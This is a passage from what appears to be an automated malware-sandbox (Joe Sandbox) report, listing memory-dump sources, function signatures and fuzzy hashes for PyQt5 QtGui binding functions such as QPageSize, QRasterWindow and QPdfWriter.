                                                                                                                                                                                                                                          • ?name@QPageSize@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D9BE09C
                                                                                                                                                                                                                                          • ?name@QPageSize@@SA?AVQString@@W4PageSizeId@1@@Z.QT5GUI ref: 00007FF89D9BE104
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Page$?name@Size@@String@@$Id@1@@Sizemalloc
                                                                                                                                                                                                                                          • String ID: QPageSize$name$name(self) -> strname(pageSizeId: QPageSize.PageSizeId) -> str
                                                                                                                                                                                                                                          • API String ID: 1812466921-2355090504
                                                                                                                                                                                                                                          • Opcode ID: 1f8ce83451499f0ffc3761486204a908d098783c8365035e47748ddf552a1f25
                                                                                                                                                                                                                                          • Instruction ID: f6a7b974c5c6e69b296517e78c895a1ecce35f62f20d35917c04c83c9998d4c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f8ce83451499f0ffc3761486204a908d098783c8365035e47748ddf552a1f25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E312A77A09A4682EB209B55E8496A973A5FF84FD0F858032DD8E07320EF7CF559C748
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRasterWindow$focusOutEvent$focusOutEvent(self, a0: Optional[QFocusEvent])
                                                                                                                                                                                                                                          • API String ID: 2314446140-926177790
                                                                                                                                                                                                                                          • Opcode ID: a2991f8b9c74b687d925db61d083c52197152c58d32ef4b3be45d8c83a80b73b
                                                                                                                                                                                                                                          • Instruction ID: aa987b06e3f9e2d5477676f7cc7c6bbaec99882d056dccdf55f6b1577f444e02
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2991f8b9c74b687d925db61d083c52197152c58d32ef4b3be45d8c83a80b73b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C21FC33A09B46D6EA608B15E44526A73E4FB84FD4F544132EACE43768EF3CE555C704
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRegExpValidator$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-4000051574
                                                                                                                                                                                                                                          • Opcode ID: 690ec265b6efc938f5b8feb84294346ddf968f43f7c6cbfd03b09380635ed334
                                                                                                                                                                                                                                          • Instruction ID: 6de96c6fd777b310c44c3401c1c3986e47256f3030923dfb317a2ebe28faaec7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 690ec265b6efc938f5b8feb84294346ddf968f43f7c6cbfd03b09380635ed334
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221F936A09B4686EA208B15E44426A77A4FB84FC4F444132EACE43B24EF3CE159D748
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRasterWindow$tabletEvent$tabletEvent(self, a0: Optional[QTabletEvent])
                                                                                                                                                                                                                                          • API String ID: 2314446140-3256538024
                                                                                                                                                                                                                                          • Opcode ID: 8d59cdecc881d435a600cb17361f81c29af7c588dad955e95a09e630c7e9e157
                                                                                                                                                                                                                                          • Instruction ID: c71973c5c634f944489a677700e5a28e11511e65423e8c1db2e82c93cde78174
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d59cdecc881d435a600cb17361f81c29af7c588dad955e95a09e630c7e9e157
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0221E633A09B46C6EA608B15E8852AA73E4FB85FC4F544132EACE43B64EF3CE555C744
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ9$QRasterWindow$connectNotify$connectNotify(self, signal: QMetaMethod)
                                                                                                                                                                                                                                          • API String ID: 59943102-1847739875
                                                                                                                                                                                                                                          • Opcode ID: 05a6abb1eb9007331ad248fc6ad10afcfe9159260899fde6fff16b8136b99afb
                                                                                                                                                                                                                                          • Instruction ID: e58512cac5728bb8da6dc9d75710d55f4a18848bc65897bd212823f7a0a208e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05a6abb1eb9007331ad248fc6ad10afcfe9159260899fde6fff16b8136b99afb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD211733A09B4696EA208F15E88526A73E4FB84FC4F544132EACE03B68EF3CE555C704
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QPdfWriter$customEvent$customEvent(self, a0: Optional[QEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-112237231
                                                                                                                                                                                                                                          • Opcode ID: 5e1ab9587a3f653f073a46ae3f6b0bdc76e11d69d94fc625d06f9e6932ae757f
                                                                                                                                                                                                                                          • Instruction ID: 824750cb158a60c96e9c0fd170b7328d4e06b3299063d2030e63c1333b5bad21
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e1ab9587a3f653f073a46ae3f6b0bdc76e11d69d94fc625d06f9e6932ae757f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8211773A09B46C2EA608B15E88426A73E4FB94FC8F444132EACE43724EF3CE155C744
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QWindow$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-4109671800
                                                                                                                                                                                                                                          • Opcode ID: 2049124feb9194ca323d961ce2ca93417cad1bac27ae7bdd43e910afe8e82484
                                                                                                                                                                                                                                          • Instruction ID: af08592fb4bceb2369b981b7ca057da38f1b05824ca4e6c748f32a76ac7baaec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2049124feb9194ca323d961ce2ca93417cad1bac27ae7bdd43e910afe8e82484
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C21E833A09B46D6EA608B15E88526A73E4FB84FC4F444132EACE43764EF3CE559C744
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QValidator$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-16578966
                                                                                                                                                                                                                                          • Opcode ID: 93977c32554485b3583ec0930b101785e1ae5a316d42d7155b8d89a905d0c767
                                                                                                                                                                                                                                          • Instruction ID: 999fe09ad068edd37c03a0215bd288ec0ce9efb592506cc33fa35b7f19546d26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93977c32554485b3583ec0930b101785e1ae5a316d42d7155b8d89a905d0c767
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69210833A09A46D6EA608B15E44426A73E4FB94FC4F444132EACE47778EF3CE155C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QTextObject$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-1060806450
                                                                                                                                                                                                                                          • Opcode ID: ebfc3d5c89b35dc673228e2b129ee55a09ba52fe50448dade6ded0eb12e88c7e
                                                                                                                                                                                                                                          • Instruction ID: ee649aeaadd61317f008ac6fea6a8af81b4970ecc50d9a1690eb970688500627
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebfc3d5c89b35dc673228e2b129ee55a09ba52fe50448dade6ded0eb12e88c7e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5321E633A09B46D6EA609B15E8842AA73E4FB84FC4F544132EACE47768EF3CE155C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRegularExpressionValidator$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-2457261612
                                                                                                                                                                                                                                          • Opcode ID: db07c2a51806eaf166a5c7dfe4288f09fbf0b85e4b905087e9764f801428060e
                                                                                                                                                                                                                                          • Instruction ID: f9a23aa2cb61318f3db674207fef4afacdf10c33242c6eb36d9df34ba03734c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db07c2a51806eaf166a5c7dfe4288f09fbf0b85e4b905087e9764f801428060e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E21F573A09A4686EA608B15E88426A73E4FB84FC4F444132EACF43768EF3CE155C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextFrame$connectNotify$connectNotify(self, signal: QMetaMethod)
                                                                                                                                                                                                                                          • API String ID: 59943102-3280819144
                                                                                                                                                                                                                                          • Opcode ID: 04a01cd2017839ce9634384e4cc83156e7a22728c5a4878d2b2d06df41850e4b
                                                                                                                                                                                                                                          • Instruction ID: 833b1c2c3e9e9c0707d1c405ea99aeb75f5bc3f82015ec0f2633dec298b8a462
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04a01cd2017839ce9634384e4cc83156e7a22728c5a4878d2b2d06df41850e4b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4210833A09B4696EA208B15E84526A73E4FB85FC4F544132EACE47B34EF3CE555C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ9$QPdfWriter$connectNotify$connectNotify(self, signal: QMetaMethod)
                                                                                                                                                                                                                                          • API String ID: 59943102-2057804258
                                                                                                                                                                                                                                          • Opcode ID: 4fd71151551caa592b0c3a82bd9b7592f0ac0997c56de8fc6813afa3305eac3d
                                                                                                                                                                                                                                          • Instruction ID: 260b9b30273b981b721aa5615cc357034a608f4502a5ddb32857320908c25ef4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fd71151551caa592b0c3a82bd9b7592f0ac0997c56de8fc6813afa3305eac3d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3211733A09B46C6EA208B15E88526A73E4FB94FC4F544132EACE03724EF3CE555C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRegularExpressionValidator$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-202952084
                                                                                                                                                                                                                                          • Opcode ID: 8c300a57845e0b3d1acf504f25ddc19604b6b2e94e592a42f14ebf32771935d7
                                                                                                                                                                                                                                          • Instruction ID: 826a38eded0bfad5b344da1073fb015f3c1efa65fd06685193ac4664a0e2adf5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c300a57845e0b3d1acf504f25ddc19604b6b2e94e592a42f14ebf32771935d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9210637A09A4686EA208B15E88526A73E4FB94FC4F444136EACE07728EF3CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QTextTable$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-2939353444
                                                                                                                                                                                                                                          • Opcode ID: b8224210fe4a3103645e9bf7bcea15d8c4baecafd138e21e45e35d2a50da8d93
                                                                                                                                                                                                                                          • Instruction ID: 8c79047e9d4e626cba91d8437da66a583dfbd34e51c7b9de4a6b7cb98225a1fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8224210fe4a3103645e9bf7bcea15d8c4baecafd138e21e45e35d2a50da8d93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C721E833A09A46D6EA209B25E44526A77E4FB84FC4F444132EACE43774EF3CE555CB04
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRasterWindow$mouseReleaseEvent$mouseReleaseEvent(self, a0: Optional[QMouseEvent])
                                                                                                                                                                                                                                          • API String ID: 2314446140-4289977624
                                                                                                                                                                                                                                          • Opcode ID: dc242274f4ad0dbe309eef7a04d99ee5fe953c688ca5094924f5f560442eb592
                                                                                                                                                                                                                                          • Instruction ID: 965c710fd43991300f3fd41e90d46b215ad02871115b736e9c375239dd9323c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc242274f4ad0dbe309eef7a04d99ee5fe953c688ca5094924f5f560442eb592
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D521D733A09B4686EA608B15E88526A77E4FB84FC4F544132EACE43764EF3CE559C744
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QStandardItemModel$customEvent$customEvent(self, a0: Optional[QEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-742182
                                                                                                                                                                                                                                          • Opcode ID: 96ded619784c3e1cc0f4241da96bbd7ab9a6639d78d60527a8098500093f09dd
                                                                                                                                                                                                                                          • Instruction ID: ce08dac04194e5f7d12154c192c9829719f858070e74040a8e6a923d4a0f37a9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96ded619784c3e1cc0f4241da96bbd7ab9a6639d78d60527a8098500093f09dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8021F973A08A46C6EA609B25E48426AB7E4FB94FC4F444132EACE43724EF2CE155D744
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                                          • String ID: BJ8$QWindow$keyReleaseEvent$keyReleaseEvent(self, a0: Optional[QKeyEvent])
                                                                                                                                                                                                                                          • API String ID: 2314446140-729342036
                                                                                                                                                                                                                                          • Opcode ID: 701dea9e4a784fdf985712df24456802574a69349d5242750e633da4472325d6
                                                                                                                                                                                                                                          • Instruction ID: e04b795b69c62b320a137079d072c1e5c99d7c5d2101b3c5e197d36e18f03188
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 701dea9e4a784fdf985712df24456802574a69349d5242750e633da4472325d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1921F773A09B46C6EA208B15E48526A73A4FB84FC4F444132EACE47724EF3CE155C748
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                                          • String ID: BJ8$QWindow$moveEvent$moveEvent(self, a0: Optional[QMoveEvent])
                                                                                                                                                                                                                                          • API String ID: 2314446140-1045797905
                                                                                                                                                                                                                                          • Opcode ID: a7617255fdf9bf3af23644da2a4fcc1b8770496e7a209aac20a3b2a7836fbfe5
                                                                                                                                                                                                                                          • Instruction ID: da97e1b70e349443dfdbf218854790fccd62152b7703eed7c4879c7317c41db2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7617255fdf9bf3af23644da2a4fcc1b8770496e7a209aac20a3b2a7836fbfe5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73210833A08B46C6EA609B15E48426A73E4FB84FD8F445132EACE47768EF3CE055C708
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?fill@?$QVector@VQPointF@@@@QEAAAEAV1@AEBVQPointF@@H@Z.QT5CORE ref: 00007FF89D933A9E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point$?fill@?$F@@@@Vector@
                                                                                                                                                                                                                                          • String ID: BJ1|i$QPolygonF$fill$fill(self, value: Union[QPointF, QPoint], size: int = -1)
                                                                                                                                                                                                                                          • API String ID: 1109879416-2067450826
                                                                                                                                                                                                                                          • Opcode ID: d9f7ddd6f8110688b49c34efcbfce030b29cf21c6c9043cacf0f4ecdb21b0407
                                                                                                                                                                                                                                          • Instruction ID: cec67748cde260a904b652fa364a8586c52a3a97979ba6f578875af0dcb9a2cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9f7ddd6f8110688b49c34efcbfce030b29cf21c6c9043cacf0f4ecdb21b0407
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5931E677A08B45C5EB208B15E8892A933A8FB48BD0F914136DAAE43720EF39E559C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?getAxisAndAngle@QQuaternion@@QEBAXPEAVQVector3D@@PEAM@Z.QT5GUI ref: 00007FF89D9B811A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?getAngle@AxisQuaternion@@Vector3malloc
                                                                                                                                                                                                                                          • String ID: (Nf)$QQuaternion$getAxisAndAngle$getAxisAndAngle(self) -> (Optional[QVector3D], Optional[float])
                                                                                                                                                                                                                                          • API String ID: 1106653836-2133363933
                                                                                                                                                                                                                                          • Opcode ID: f7500f8db1349cdf1623e14b636283c3f31b8091470a7acb06b22ecdefdb5d1f
                                                                                                                                                                                                                                          • Instruction ID: fcc55b1df0a7741b28baa1d76ab72737ce28333ab7812fec63fc7043ac9b986a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7500f8db1349cdf1623e14b636283c3f31b8091470a7acb06b22ecdefdb5d1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5211D73A18B4681EB108F12E8455A973A5FB89FD0F918136DA9E47324EF3CE595C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?mapBetween@QScreen@@QEBA?AVQRect@@W4ScreenOrientation@Qt@@0AEBV2@@Z.QT5GUI ref: 00007FF89D96C137
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?mapBetween@Orientation@Qt@@0Rect@@ScreenScreen@@V2@@malloc
                                                                                                                                                                                                                                          • String ID: BEEJ9$QScreen$mapBetween$mapBetween(self, a: Qt.ScreenOrientation, b: Qt.ScreenOrientation, rect: QRect) -> QRect
                                                                                                                                                                                                                                          • API String ID: 3281288664-3086348255
                                                                                                                                                                                                                                          • Opcode ID: 66aa9b6b2549de9cd797f79221c3f70c2b7a0243343f30667b2c830d24613ddf
                                                                                                                                                                                                                                          • Instruction ID: 061c10c2e9f4255d0a8f2809a95bc7700fe9a798a02dd853785df976786af344
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66aa9b6b2549de9cd797f79221c3f70c2b7a0243343f30667b2c830d24613ddf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8211937B19B4685EB60CB11E8887AD33A5FB48BD0F814036DA9E43320EF39E558C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setMetaInformation@QTextDocument@@QEAAXW4MetaInformation@1@AEBVQString@@@Z.QT5GUI ref: 00007FF89D943EBA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Meta$?setDocument@@Information@Information@1@String@@@Text
